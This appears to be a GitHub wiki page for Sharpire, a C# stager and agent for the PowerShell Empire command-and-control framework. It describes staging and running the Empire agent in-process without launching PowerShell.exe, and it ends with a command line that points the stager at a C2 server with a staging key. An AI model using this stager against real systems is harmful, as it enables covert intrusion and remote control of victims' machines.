-
Notifications
You must be signed in to change notification settings - Fork 30
Home
Sharpire is a C# stager and agent for PowerShell Empire. Sharpire is intended to replace the stager and/or agent for Empire on Windows systems.
This tool has two fundamental methods of operation.
The first is to act as the stager/droper for Empire. When operating in this mode Sharpire will handle negotiating and staging down the PowerShell agent (Invoke-Empire) and executing it in a runspace in the application. When doing this PowerShell.exe is never called, just System.Management.Automation.dll.
The second mode will have Shapire act as the agent as well as the stager. In this mode, the agent will recieve the modules as the normal PowerShell agent would, but instead execute each one in an independent runspace that is then destroyed upon completion of the module.
There are also two options for passing execution settings to Sharpire. The first has all options set at compile time via app.config and the other where the Empire server, staging key, and agent are set as command line options.
Pre-Compiled Mode:
C:\> Shapire.exe
Arguments Mode:
C:\> Sharpire.exe "http://192.168.0.188:80" "zya{68H)<}uY.(Ml|sFNhoSR79Vqj_Wd" "dotnet"